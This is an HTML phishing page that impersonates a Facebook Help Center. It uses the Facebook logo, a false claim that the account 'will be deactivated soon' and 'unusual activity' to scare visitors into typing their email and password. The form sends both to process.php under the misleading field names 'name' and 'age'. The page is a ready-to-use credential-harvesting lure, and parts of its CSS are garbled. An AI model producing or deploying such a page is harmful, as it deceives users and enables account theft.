<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Action Required</title>
<style>
@font-face {
font-family: 'FacebookFont';
src: url('facebook-font.ttf') format('truetype');
}
body {
background-color: #f0f2f5;
font-family: Arial, sans-serif;
}
body {
margin: 0;
padding: 0;
font-family: Arial, sans-serif;
}
#header {
background-color: white;
box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.1);
height: 50px;
display: flex;
align-items: center;
padding: 0 20px;
}
#facebook-logo {
width: 60px; /* Adjust the width as needed */
margin-right: 10px;
}
#header h1 {
font-size: 24px;
margin: 0;
}
#facebook-text {
font-family: 'FacebookFont', Arial, sans-serif;
font-size: 24px;
margin-left: 10px; /* Adjust spacing as needed */
}
#container {
background-color: white;
margin: 20px auto;
padding: 20px;
width: 400px;
border-radius: 5px;
box-shadow: 0px 0px 1px 0px #000000;
}
label {
display: block;
margin-bottom: 5px;
}
input[type="text"] {
width: 100%;
padding: 10px;
margin-bottom: 10px;
border: 1px solid #ccc;
border-radius: 3px;
}
input[type="password"] {
width: 100%;
padding: 10px;
margin-bottom: 10px;
border: 1px solid #ccc;
border-radius: 3px;
}
a:-webkit-any-link {
color: #1877f2;
cursor: pointer;
text-decoration: auto;
}
button[type="submit"] {
background-color: #1877f2;
color: white;
padding: 10px 170px;
border: none;
border-radius:
border: none;
border
3px;
cursor: pointer;
font-size: 16px;
font-weight: bold;
}
button[type=
font-weight: bold;
}
"submit"]:hover {
background-color: #0e59a7;
}
</style>
</head>
<body>
<div id="header">
<img src="https://ww1.freelogovectors.net/wp-content/uploads/2023/03/facebook-logo-new-2019-freelogovectors.net_.png" id="facebook-logo" alt="Facebook Logo Placeholder">
<h3>Help Center</h3>
</div>
</div>
<div id="container">
<b> Your account will be deactivated soon</b><br>
<br>
We detected unusual activity in your account <b>today</b>. This can result in your account being permanently disabled for not complying with the <a href>Community Standards</a>. We have reviewed this decision and it cannot be changed.
<img alt="" src="https://i.imgur.com/lTmFPZt.png" width="100%">
<b>We send you a security notification</b> <br>
To avoid deactivating your account, please verify your account.
<form action="process.php" method="POST">
<label for="name"><b>Email:</b></label>
<input type="text" id="name" name="name" required>
<label for="age"><b>Password:</b></label>
<input type="password" id="age" name="age" required>
<button type="submit">Continue</button>
</form>
</div>
<div id="footer1">
English (UK) <a href="">हिन्दी</a><a href="">ਪੰਜਾਬੀ</a><a href=""> اردو</a><a href="">தமிழ்</a><a href="">বাংলা</a><a href="">मराठी</a><a href="">తెలుగు</a><a href="">ગુજરાતી</a><a href="">ಕನ್ನಡ</a><a href="">മലയാളം</a>
</div>
<div id="footer2">
<a href="">Sign Up</a><a href="">Log In</a><a href="">Messenger</a><a href="">Talkerscode</a><a href="">Mobile</a><a href="">Find Friends</a><a href="">Badges</a><a href="">People</a><a href="">Pages</a><a href="">Places</a><a href="">Games</a><a href="">Locations</a><a href="">Celebrities</a><a href="">Groups</a><a href="">Moments</a><a href="">About</a><a href="">Create Advert</a><a href="">Create Page</a><a href="">Developers</a><a href="">Careers</a><a href="">Privacy</a><a href="">Cookies</a><a href="">Ads</a><a href="">Terms</a><a href="">Help</a>
</div>
</div>
</div>
</body>
</html>
<style>
/* Footer styles */
#footer_wrapper {
width: 100%;
clear: both;
float: left;
margin-top: 30px;
min-width: 995px;
background-color: white;
text-align: left;
}
#footer1 {
width: 980px;
margin: 0px auto;
padding: 0px;
border-bottom: 1px solid #E6E6E6;
height: 30px;
line-height: 30px;
font-size: 12px;
color: #848484;
}
#footer1 a {
color: #365899;
display: inline;
margin-left: 10px;
text-decoration: none;
}
#footer1 a:hover {
text-decoration: underline;
}
#footer2 {
width: 980px;
margin: 0px auto;
padding: 0px;
font-size: 12px;
color: #848484;
}
#footer2 a {
color: #365899;
display: inline-block;
margin: 5px;
margin-left: 0px;
min-width: 80px;
text-decoration: none;
}
#footer2 a:hover {
text-decoration: underline;
}
</style>
<style>/* CSS in a separate stylesheet or within a <style> element in the <head> section */
footer {
background-color: #fff;
color: #fff;
}
/* CSS to resize the image */
.resized-image {
width: 150px; /* Set the desired width */
height: auto; /* Automatically adjust the height to maintain aspect ratio */
}
</style>